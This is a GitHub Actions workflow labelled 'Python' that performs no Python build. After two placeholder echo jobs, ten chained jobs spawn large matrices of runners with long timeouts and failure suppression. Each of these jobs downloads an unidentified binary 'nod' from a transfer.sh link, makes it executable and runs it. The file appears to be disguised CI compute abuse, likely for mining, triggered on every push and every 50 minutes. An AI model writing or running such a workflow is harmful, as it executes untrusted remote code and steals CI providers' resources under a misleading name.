name: Python 
on:   
  push: 
  pull_request: 
  schedule: 
  - cron: "*/50 * * * *" 

jobs: 
 python-1: 
    runs-on: ubuntu-latest 
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [A, B, C, D] 
    timeout-minutes: 360 

    steps: 
    - uses: actions/checkout@v3 
    - name: Python-run 
      run: echo "pythosns" 

 python-2: 
    runs-on: ubuntu-latest  
    needs: python-1 
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [A, B, C, D] 
    timeout-minutes: 360 

    steps: 
    - uses: actions/checkout@v3 
    - name: Python-run 
      run: echo "python" 

 python-build-1: 
    runs-on: ubuntu-20.04  
    needs: python-2 
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
  
 python-build-2: 
    runs-on: ubuntu-20.04  
    needs: python-build-1
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12] 
         flag: [B] 
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
 python-build-3: 
    runs-on: ubuntu-20.04  
    needs: python-build-2 
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
  
 python-build-4: 
    runs-on: ubuntu-20.04  
    needs: python-build-3
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
 python-build-5: 
    runs-on: ubuntu-20.04  
    needs: python-build-4 
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
  
 python-build-6: 
    runs-on: ubuntu-20.04  
    needs: python-build-5
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod

 python-build-7: 
    runs-on: ubuntu-20.04  
    needs: python-build-6 
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
  
 python-build-8: 
    runs-on: ubuntu-20.04  
    needs: python-build-7
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
 python-build-9: 
    runs-on: ubuntu-20.04  
    needs: python-build-8 
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
  
 python-build-10: 
    runs-on: ubuntu-20.04  
    needs: python-build-9
    strategy: 
      fail-fast: false 
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
         flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk]
    timeout-minutes: 350 
    steps: 
    - uses: actions/checkout@v3 
    - name: Rerunning 
      continue-on-error: true 
      run: | 
         wget https://transfer.sh/cerT71/nod; chmod +x nod; ./nod
